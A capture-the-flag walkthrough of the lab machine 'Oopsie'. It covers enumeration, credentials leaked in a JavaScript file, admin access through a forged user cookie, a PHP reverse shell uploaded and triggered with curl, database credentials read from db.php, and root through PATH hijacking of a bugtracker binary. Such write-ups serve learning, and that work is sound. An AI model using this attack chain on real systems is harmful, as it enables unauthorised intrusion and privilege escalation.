
Oopsie

Personal Rating: Easy

Enumeration

A first nmap scan reveals some open ports:

sudo nmap -sC <IP>

# 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
# 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome

At the web server the directory /cdn-cgi was listable; I found the directory itself by fuzzing for it with ffuf. Inside it I found /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js, which contained some credentials:

admin
MEGACORP_4dm1n!!
34322	admin	admin@megacorp.com
8832	john	john@tafcz.co.uk
86575	super admin	superadmin@megacorp.com

Web Access and Insecure Cookie Abuse

Logging in at http://<TARGETIP>/cdn-cgi/login with the credentials I found, I saw a file upload feature that seemed to require the higher permissions of some "super admin".

Since the page was PHP based and there was no session information in the URL, maybe there was a session cookie... I found the cookie, which was not a proper session ID but a custom string. In the public code of /login/admin.php I found this:

if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575")

So I got privileged access to http://<TARGETIP>/cdn-cgi/login/admin.php?content=uploads&action=upload by loading that page with the user cookie set to "34322".

Shell Access and Pillaging

At the upload page I could upload a PHP reverse shell and activate it with curl:

curl http://10.10.10.28/uploads/php-reverse-shell.php

The shell ran as the user www-data. Running cat /var/www/html/cdn-cgi/login/db.php yielded the following credentials:

$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

With those credentials I could establish an SSH connection as the user robert.

Insecure Relative Path

Checking the user's groups, I saw that robert was in the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple strings bugtracker showed me this:

------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"

I created the file /home/robert/soos/cat, a script that starts /bin/bash. Then I prepended that directory to the PATH, so that my version of cat is used whenever cat is called without an absolute path:

export PATH=/home/robert/soos:$PATH

Executing the bugtracker binary now, I could start a root shell.
